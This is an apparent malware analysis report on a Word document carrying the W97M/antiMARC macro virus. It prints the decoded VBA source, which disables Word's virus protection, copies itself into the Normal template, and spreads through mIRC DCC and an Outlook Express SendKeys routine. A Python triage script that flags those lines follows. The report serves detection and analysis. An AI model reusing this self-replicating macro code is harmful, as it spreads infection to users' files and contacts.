Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3b7234df28faefb3…

MALICIOUS

Office (OLE)

Size: 64.0 KB
Created: 2001-02-27 07:58:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 4fcc929a51db410b5ea9fe89399bedf0
SHA-1: 7f305b6fd8a38259a116c79e03b520b3b6eeee7d
SHA-256: 3b7234df28faefb3695568daf25ff250dbaa4e31dafd749030ca5eb6da6bfed5
Risk score: 210

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample is a Word document infected with the W97M/antiMARC macro virus; the macro names itself in its own comment ('W97M/antiMARC by Lord Natas [Codebreakers 98]'). On execution it switches off Word's macro virus protection, alerts and save prompts (Options.VirusProtection, DisplayAlerts, SaveNormalPrompt), exports its own VBA module through Application.VBE to %WINDIR%\system\microsof.386, and imports that file into the Normal template and into the active document wherever no component named 'antiMARC' exists yet, saving both so that the infection persists in Normal.dot and spreads to every document edited afterwards. Two payloads fire at random (a 1-in-1024 roll each): mIRCDropper writes a mIRC script.ini that DCC-sends the document (saved as c:\windows\xxxpasswords.doc) to anyone joining a channel, and OE launches the Outlook Express address book (wab.exe; this is the only Shell() call) and drives it with SendKeys to compose a message to address-book entries (the routine is cut off in the preview). The Shell() hit is therefore a payload launcher, not evidence of a downloader: the macro contains no URL, and every URL extracted below sits in the document body text rather than in the macro.

Heuristics 5

  • ClamAV: Doc.Trojan.Antimarc-2 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Antimarc-2
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code (modules ThisDocument and antiMARC; see the extracted artifact below)
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA: "Shell oeFile, 4" launches the Outlook Express address book (wab.exe) in the OE() payload
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ("WINDIR") resolves the Windows directory that the macro uses for its dropped module, system\microsof.386
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs, each with the channel that reached it (all twelve were found in the document text, i.e. the OLE body, none in the macro):
    • http://www2.pokemon.com/pokedex/images/pixel.gif (in document text, OLE body)
    • http://www2.pokemon.com/pokedex/images/top_ash.gif (in document text, OLE body)
    • http://www2.pokemon.com/pokedex/images/top_000b.gif (in document text, OLE body)
    • http://www2.pokemon.com/pokedex/images/title_ash.gif (in document text, OLE body)
    • http://www2.pokemon.com/pokedex/images/tm2.gif (in document text, OLE body)
    • http://www2.pokemon.com/pokedex/images/stat.gif (in document text, OLE body)
    • http://www2.pokemon.com/pokedex/images/char_ash.gif (in document text, OLE body)
    • http://www2.pokemon.com/pokedex/images/bottom_000a.gif (in document text, OLE body)
    • http://www2.pokemon.com/pokedex/images/bottom_000b.gif (in document text, OLE body)
    • http://www2.pokemon.com/pokedex/images/bottom_000c.gif (in document text, OLE body)
    • http://www2.pokemon.com/pokedex/images/pokedex_small.gif (in document text, OLE body)
    • http://www.nintendo.com/copyright.html (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16415 bytes
SHA-256: 745c9cce253336b439fb3148e8c4bd03a8152f50eefd76f7cb580f2ff350541a
Detection: ClamAV: Doc.Trojan.Antimarc-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1HTML.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "HTMLSelect1, 0, 0, MSForms, HTMLSelect"

Attribute VB_Name = "antiMARC"
Sub antiMARC()
'W97M/antiMARC by Lord Natas [Codebreakers 98]
'with special thanks to Rhape79
'"We're just the toys in the hands of another"
On Error Resume Next
Application.EnableCancelKey = 0
Application.DisplayAlerts = 0
WordBasic.DisableAutoMacros = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Options.SavePropertiesPrompt = 0
Options.ConfirmConversions = 0
WinDir = Environ("WINDIR") & "\"
Application.VBE.ActiveVBProject.VBComponents("antiMARC").Export WinDir & "system\microsof.386"
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "antiMARC" Then a = -1
Next i
For J = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(J).Name = "antiMARC" Then b = -1
Next J
If a = 0 Then
NormalTemplate.VBProject.VBComponents.Import WinDir & "system\microsof.386"
NormalTemplate.Save
End If
If b = 0 Then
ActiveDocument.VBProject.VBComponents.Import WinDir & "system\microsof.386"
If Left(ActiveDocument.Name, 8) <> "Document" And Left(ActiveDocument.Name, 8) <> "Template" Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End If
End If
randomize
If Int(Rnd() * 1024) = 666 Then Call mIRCDropper
If Int(Rnd() * 1024) = 666 + 6 Then Call OE
End Sub
Private Sub mIRCDropper()
On Error Resume Next
If Dir("C:\mirc\mirc32.exe") = "" Then GoTo NomIRC
m = System.PrivateProfileString("C:\mirc\mirc.ini", "warn", "fserve")
If m <> "" Then System.PrivateProfileString("C:\mirc\mirc.ini", "warn", "fserve") = "off"
m = System.PrivateProfileString("C:\mirc\mirc.ini", "fileserver", "Warning")
If m <> "" Then System.PrivateProfileString("C:\mirc\mirc.ini", "fileserver", "Warning") = "Off"
Open "C:\mirc\script.ini" For Output As #1
Print #1, "[script]"
Print #1, "n0=on 1:CONNECT: {"
Print #1, "n1=/msg marc FuCk YoU FaScIsT"
Print #1, "n2=/msg warblade STILL SUCKING MARC's COCK?? eh, sure you do!!"
Print #1, "n3=/msg super Hey M0therfux0r, shove X/W up yer fat pimple-covered ass!"
Print #1, "n4=/msg super 'We do not support the distribution of virii' - i guess you do now, bitch!"
Print #1, "n5=/msg #gotinfected777 Kick Me! - I'm InFeCtEd!"
Print #1, "n6=}"
Print #1, "n7=on 1:JOIN:#: if ( $me != $nick) { /dcc send $nick c:\windows\xxxpasswords.doc }"
Print #1, "n8=on 1:TEXT:*marcsux*:#: {"
Print #1, "n9=/ctcp $nick X"
Print #1, "n10=/msg #gotinfected777 X"
Print #1, "n11=}"
Print #1, "n12=on 1:TEXT:marcisalamer*:?:{ s *2 | halt }"
Print #1, "n13=alias /s / *1"
Close #1
ActiveDocument.Save
ActiveDocument.SaveAs FileName:="c:\windows\xxxpasswords.doc", AddToRecentFiles:=False
Application.Quit SaveChanges:=wdDoNotSaveChanges
NomIRC:
End Sub
Private Sub OE()
On Error Resume Next
For i = 1 To 8
randomize
Temp = Temp + Chr$(Int(Rnd() * (90 - 65) + 65))
Next
sName = "C:\" + Temp + ".DOC"
ActiveDocument.SaveAs FileName:=sName
For Each myTask In Tasks
If InStr(myTask.Name, "Address Book") > 0 Then
myTask.Activate (0)
Call Delay
GoTo NextShit
End If
Next myTask
oeFile = "C:\Program Files\Outlook Express\wab.exe"
If Dir(oeFile) <> "" Then
Shell oeFile, 4
GoTo NextShit
End If
GoTo NoOE
NextShit:
t = "Address Book - (C:\WINDOWS\Application Data\Microsoft\Address Book\UserMPS.wab)"
loop1:
If Tasks.Exists(t) = False Then GoTo loop1
Call Delay
SendKeys "{TAB}", -1
SendKeys "+({DOWN 20})", -1
SendKeys "%T", -1
SendKeys "M", -1
loop2:
If Tasks.Exists("New Message") = False Then GoTo loop2
Call Delay
SendKeys "{TAB}", -1
SendKeys "{TAB}", -1
SendKeys "{TAB}", -1
randomize
For i = 1 To Int(Rnd() * (35 - 1) + 1)
If Rnd() < Rnd() Then
R = R + Chr$(Int(Rnd() * (122 - 97) + 97))
Else
R = R + Chr$(I
... (truncated)
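The summary above corrects the report's Shell()-equals-downloader reading by looking at what the macro actually does (self-replication through VBComponents Export/Import into Normal.dot, protection tampering, SendKeys, file drops), and the EMBEDDED_URL entry depends on labelling each URL with the channel that reached it. The following triage script is an added example, not part of this report and not oletools code: it runs the same kind of per-line heuristics over decoded VBA text of the sort olevba emits, resolves the Environ("WINDIR")-prefixed drop path, and labels URLs by channel. OLE_VBA_SHELL and OLE_VBA_ENVIRON are the report's finding ids; the other ids, the severities and the verdict rule are this example's own assumptions. The VBA input is an excerpt of the macro listed above; the document-body input is constructed.

```python
import re
from collections import Counter

# Sample input 1: an excerpt of the decoded antiMARC macro source listed above
# (the full module is 16415 bytes; these lines carry the indicators of interest).
VBA_SAMPLE = r'''
Sub antiMARC()
On Error Resume Next
Options.VirusProtection = 0
WinDir = Environ("WINDIR") & "\"
Application.VBE.ActiveVBProject.VBComponents("antiMARC").Export WinDir & "system\microsof.386"
NormalTemplate.VBProject.VBComponents.Import WinDir & "system\microsof.386"
NormalTemplate.Save
End Sub
Private Sub mIRCDropper()
Open "C:\mirc\script.ini" For Output As #1
Print #1, "n7=on 1:JOIN:#: if ( $me != $nick) { /dcc send $nick c:\windows\xxxpasswords.doc }"
ActiveDocument.SaveAs FileName:="c:\windows\xxxpasswords.doc", AddToRecentFiles:=False
End Sub
Private Sub OE()
oeFile = "C:\Program Files\Outlook Express\wab.exe"
Shell oeFile, 4
SendKeys "%T", -1
End Sub
'''

# Sample input 2 (constructed): a stand-in for the document body text (the OLE
# WordDocument stream), carrying two of the URLs the report lists under EMBEDDED_URL.
DOC_BODY_SAMPLE = (
    '<img src="http://www2.pokemon.com/pokedex/images/pixel.gif"> '
    '<a href="http://www.nintendo.com/copyright.html">copyright</a>'
)

SEVERITY_RANK = {"info": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}

# (finding id, severity, regex applied to each line of decoded VBA). OLE_VBA_SHELL and
# OLE_VBA_ENVIRON are the report's own ids; the remaining ids and all severities are
# assumptions made for this example.
HEURISTICS = (
    ("OLE_VBA_SHELL", "critical", r"\bShell\b"),
    ("OLE_VBA_SELF_REPLICATION", "critical", r"\bVBComponents\b.*\.(Export|Import)\b"),
    ("OLE_VBA_NORMAL_TEMPLATE_WRITE", "high", r"\bNormalTemplate\b.*\b(Import|Save)\b"),
    ("OLE_VBA_SECURITY_TAMPER", "high", r"\bOptions\.VirusProtection\s*=\s*0\b"),
    ("OLE_VBA_SENDKEYS", "medium", r"\bSendKeys\b"),
    ("OLE_VBA_FILE_WRITE", "medium", r"\bOpen\b.*\bFor\s+(Output|Append|Binary)\b"),
    ("OLE_VBA_ENVIRON", "low", r"\bEnviron\s*\("),
)
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""", re.IGNORECASE)


def strip_comment(line):
    """Cut a trailing VBA ' comment, ignoring apostrophes inside "..." literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def scan_vba(vba):
    """Return (finding_id, severity, line_no, line) for every heuristic hit. VBA is
    case-insensitive, so the patterns are matched that way too."""
    hits = []
    for no, raw in enumerate(vba.splitlines(), 1):
        code = strip_comment(raw)
        for fid, sev, pattern in HEURISTICS:
            if re.search(pattern, code, re.IGNORECASE):
                hits.append((fid, sev, no, raw.strip()))
    return hits


def extract_paths(vba):
    """Collect file-system paths from string literals. A variable assigned as
    Environ("VAR") & "\\" is remembered so that VAR & "sub\\file" becomes %VAR%\\sub\\file."""
    env_prefix = {}
    paths = set()
    for raw in vba.splitlines():
        line = strip_comment(raw)
        m = re.match(r'\s*(\w+)\s*=\s*Environ\("(\w+)"\)\s*&\s*"\\"', line, re.IGNORECASE)
        if m:
            env_prefix[m.group(1).lower()] = "%" + m.group(2).upper() + "%\\"
        for lit in re.findall(r'"([^"\n]*)"', line):
            if re.match(r"[A-Za-z]:\\", lit):
                paths.add(lit)                                        # literal is an absolute path
            else:
                paths.update(re.findall(r'[A-Za-z]:\\[^\s"]+', lit))  # path embedded in longer text
        for var, lit in re.findall(r'(\w+)\s*&\s*"([^"\n]*\\[^"\n]*)"', line):
            if var.lower() in env_prefix:
                paths.add(env_prefix[var.lower()] + lit)
    return sorted(paths)


def extract_urls(vba, doc_body):
    """Map each URL to the channel(s) it was found in, as the report's per-URL labels do."""
    channels = {}
    for label, text in (("vba-macro", vba), ("document body", doc_body)):
        for url in URL_RE.findall(text):
            channels.setdefault(url, set()).add(label)
    return {u: sorted(channels[u]) for u in sorted(channels)}


def triage(vba, doc_body=""):
    """Summarise one sample: per-id counts, a verdict, referenced paths and URL channels."""
    hits = scan_vba(vba)
    counts = Counter(fid for fid, _, _, _ in hits)
    severity = {fid: sev for fid, sev, _, _ in hits}
    worst = max((SEVERITY_RANK[s] for s in severity.values()), default=0)
    verdict = ("malicious" if worst >= SEVERITY_RANK["critical"]
               else "suspicious" if worst >= SEVERITY_RANK["medium"] else "clean")
    return {
        "verdict": verdict,
        "findings": {fid: (severity[fid], counts[fid]) for fid in counts},
        "self_replicating": "OLE_VBA_SELF_REPLICATION" in counts,
        "paths": extract_paths(vba),
        "urls": extract_urls(vba, doc_body),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(VBA_SAMPLE, DOC_BODY_SAMPLE), indent=2))
```

Run against the excerpt, the script reports two self-replication hits (the Export and the Import), the Normal-template writes, the protection tampering, one Shell() and one SendKeys hit, resolves the drop path to %WINDIR%\system\microsof.386, and attributes both URLs to the document body and none to the macro, which is the evidence the verdict paragraph rests on. Heuristics of this kind are line-based and will miss code split across continuation lines or built from Chr$() pieces, so treat them as triage, not as a replacement for reading the module.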